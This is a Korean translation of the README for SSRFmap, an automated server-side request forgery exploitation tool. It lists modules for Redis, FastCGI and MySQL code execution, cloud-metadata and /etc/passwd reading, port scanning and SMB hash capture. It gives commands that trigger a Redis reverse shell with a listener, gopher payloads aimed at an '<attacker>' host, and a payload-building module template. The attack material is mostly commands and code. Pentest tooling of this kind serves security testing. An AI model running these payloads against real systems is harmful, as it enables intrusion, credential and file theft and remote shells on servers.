SSRF는 종종 다른 서비스에 대한 작업을 활용하는 데 사용되며, 이 프레임워크는 이러한 서비스를 쉽게 찾고 활용하는 것을 목표로 합니다. SSRFmap은 Burp 요청 파일을 입력으로 사용하고 매개변수를 fuzz로 사용합니다.
서버 측 요청 위조(SSRF)는 공격자가 서버가 자신을 대신하여 요청을 수행하도록 강제하는 취약점입니다.
다음 모듈은 이미 구현되어 있으며 -m
인수와 함께 사용할 수 있습니다.
이름 | 설명 |
---|---|
axfr | DNS 영역 전송(AXFR) |
fastcgi | 빠른CGI RCE |
redis | 레디스 RCE |
github | Github 엔터프라이즈 RCE <2.8.7 |
zabbix | 자빅스 RCE |
mysql | MySQL 명령 실행 |
postgres | Postgres 명령 실행 |
docker | API를 통한 Docker Infoleaks |
smtp | SMTP 메일 보내기 |
portscan | 호스트의 상위 8000개 포트를 검색합니다. |
networkscan | 네트워크를 통한 HTTP Ping 스윕 |
readfiles | /etc/passwd 와 같은 파일 읽기 |
alibaba | 공급자로부터 파일 읽기(예: 메타데이터, 사용자 데이터) |
aws | 공급자로부터 파일 읽기(예: 메타데이터, 사용자 데이터) |
gce | 공급자로부터 파일 읽기(예: 메타데이터, 사용자 데이터) |
digitalocean | 공급자로부터 파일 읽기(예: 메타데이터, 사용자 데이터) |
socksproxy | SOCKS4 프록시 |
smbhash | UNC 경로를 통해 SMB 인증을 강제합니다. |
tomcat | Tomcat Manager에 대한 무차별 공격 |
custom | 사용자 정의 데이터를 청취 서비스로 보냅니다(예: netcat) |
memcache | Memcache 인스턴스 내부에 데이터 저장 |
Github 저장소에서.
$ git clone https: // github.com / swisskyrepo / SSRFmap
$ cd SSRFmap /
$ pip3 install - r requirements.txt
$ python3 ssrfmap.py
usage: ssrfmap.py [ - h ] [ - r REQFILE ] [ - p PARAM ] [ - m MODULES ] [ - l HANDLER ]
[ - v [ VERBOSE ]] [ -- lhost LHOST ] [ -- lport LPORT ]
[ -- uagent USERAGENT ] [ -- ssl [ SSL ]] [ -- level [ LEVEL ]]
optional arguments:
- h , -- help show this help message and exit
- r REQFILE SSRF Request file
- p PARAM SSRF Parameter to target
- m MODULES SSRF Modules to enable
- l HANDLER Start an handler for a reverse shell
- v [ VERBOSE ] Enable verbosity
-- lhost LHOST LHOST reverse shell or IP to target in the network
-- lport LPORT LPORT reverse shell or port to target in the network
-- uagent USERAGENT User Agent to use
-- ssl [ SSL ] Use HTTPS without verification
-- proxy PROXY Use HTTP(s) proxy (ex: http: // localhost: 8080 )
-- level [ LEVEL ] Level of test to perform ( 1 - 5 , default : 1 )
도커
$ git clone https: // github.com / swisskyrepo / SSRFmap
$ docker build -- no - cache - t ssrfmap .
$ docker run - it ssrfmap ssrfmap.py [ OPTIONS ]
$ docker run - it - v $ (pwd): / usr / src / app ssrfmap ssrfmap.py
먼저 퍼지할 매개변수가 있는 요청이 필요합니다. Burp 요청은 SSRFmap과 잘 작동합니다. 다음과 같아야 합니다. ./examples 폴더에서 더 많은 예제를 볼 수 있습니다.
POST / ssrf HTTP / 1.1
Host: 127.0 . 0.1 : 5000
User - Agent: Mozilla / 5.0 (X11; Linux x86_64; rv: 62.0 ) Gecko / 20100101 Firefox / 62.0
Accept: text / html , application / xhtml + xml , application / xml;q = 0.9 , */* ;q = 0.8
Accept - Language: en - US , en;q = 0.5
Accept - Encoding: gzip , deflate
Referer: http: // mysimple.ssrf /
Content - Type: application / x - www - form - urlencoded
Content - Length: 31
Connection: close
Upgrade - Insecure - Requests: 1
url = https % 3A % 2F % 2Fwww.google.fr
-m
다음에 모듈 이름을 사용하십시오(여러 모듈을 실행하려는 경우 ,
구분).
# Launch a portscan on localhost and read default files
python ssrfmap.py - r examples / request.txt - p url - m readfiles , portscan
헤더 내부에 GET 또는 POST 매개변수를 삽입하려면 매개변수 이름만 지정하면 됩니다.
python ssrfmap.py - r examples / request6.txt - p X - Custom - Header - m readfiles -- rfiles / tmp / test
사용자 정의 사용자 에이전트가 필요한 경우 --uagent
사용하세요. 일부 대상은 HTTPS를 사용하므로 --ssl
사용하여 활성화할 수 있습니다.
# Launch a portscan against an HTTPS endpoint using a custom user-agent
python ssrfmap.py - r examples / request.txt - p url - m portscan -- ssl -- uagent " SSRFmapAgent "
일부 모듈에서는 다시 연결을 생성할 수 있으므로 LHOST
및 LPORT
지정해야 합니다. 또한 SSRFmap은 들어오는 역방향 쉘을 수신할 수 있습니다.
# Triggering a reverse shell on a Redis
python ssrfmap.py - r examples / request.txt - p url - m redis -- lhost = 127.0 . 0.1 -- lport = 4242 - l 4242
# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
대상이 WAF 또는 일부 필터로 보호되는 경우 --level
매개변수를 사용하여 광범위한 페이로드 및 인코딩을 시도할 수 있습니다.
# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...
data/example.py
SSRF 서비스를 사용하면 프레임워크를 빠르게 테스트할 수 있습니다.
현지의
FLASK_APP = examples / example.py flask run &
python ssrfmap.py - r examples / request.txt - p url - m readfiles
도커
docker build -- no - cache - t ssrfmap .
# run example ssrf http service
docker run - it - v $ (pwd): / usr / src / app -- name example ssrfmap examples / example.py
# run example ssrf dns service
docker exec - u root:root - it example python examples / ssrf_dns.py
# run ssrfmap tool
docker exec - it example python ssrfmap.py - r examples / request.txt - p url - m readfiles
테스트 요청을 실행합니다.
docker exec - it example python ssrfmap.py - r examples / request.txt - p url - m readfiles -- rfiles / etc / issue
docker exec - it example python ssrfmap.py - r examples / request2.txt - p url - m readfiles -- rfiles / etc / issue
docker exec - it example python ssrfmap.py - r examples / request3.txt - p url - m readfiles -- rfiles / etc / issue
docker exec - it example python ssrfmap.py - r examples / request4.txt - p url - m readfiles -- rfiles / etc / issue
docker exec - it example python ssrfmap.py - r examples / request5.txt - p url - m readfiles -- rfiles / etc / issue
docker exec - it example python ssrfmap.py - r examples / request6.txt - p X - Custom - Header - m readfiles -- rfiles / etc / issue
docker exec - it example python ssrfmap.py - r examples / request.txt - p url - m axfr
docker exec - it example python ssrfmap.py - r examples / request3.txt - p url - m axfr -- lhost 127.0 . 0.1 -- lport 53 -- ldomain example.lab
I ❤️ 풀 요청 :) 아래 나열된 기능이나 새로운 서비스를 자유롭게 추가하세요.
gopher: // < proxyserver > : 8080 / _GET http: // < attacker: 80 > / x HTTP / 1.1 % 0A % 0A
gopher: // < proxyserver > : 8080 / _POST % 20http: // < attacker > : 80 / x % 20HTTP / 1.1 % 0ACookie: % 20eatme % 0A % 0AI + am + a + post + body
다음 코드는 서비스와 상호 작용하는 모듈을 추가하려는 경우의 템플릿입니다.
from core . utils import *
import logging
name = "servicename in lowercase"
description = "ServiceName RCE - What does it do"
author = "Name or pseudo of the author"
documentation = [ "http://link_to_a_research" , "http://another_link" ]
class exploit ():
SERVER_HOST = "127.0.0.1"
SERVER_PORT = "4242"
def __init__ ( self , requester , args ):
logging . info ( "Module '{}' launched !" . format ( name ))
# Handle args for reverse shell
if args . lhost == None : self . SERVER_HOST = input ( "Server Host:" )
else : self . SERVER_HOST = args . lhost
if args . lport == None : self . SERVER_PORT = input ( "Server Port:" )
else : self . SERVER_PORT = args . lport
# Data for the service
# Using a generator to create the host list
# Edit the following ip if you need to target something else
gen_host = gen_ip_list ( "127.0.0.1" , args . level )
for ip in gen_host :
port = "6379"
data = "*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
payload = wrapper_gopher ( data , ip , port )
# Handle args for reverse shell
payload = payload . replace ( "SERVER_HOST" , self . SERVER_HOST )
payload = payload . replace ( "SERVER_PORT" , self . SERVER_PORT )
# Send the payload
r = requester . do_request ( args . param , payload )
맥주 IRL이나 Github 스폰서 버튼을 통해 기여할 수도 있습니다.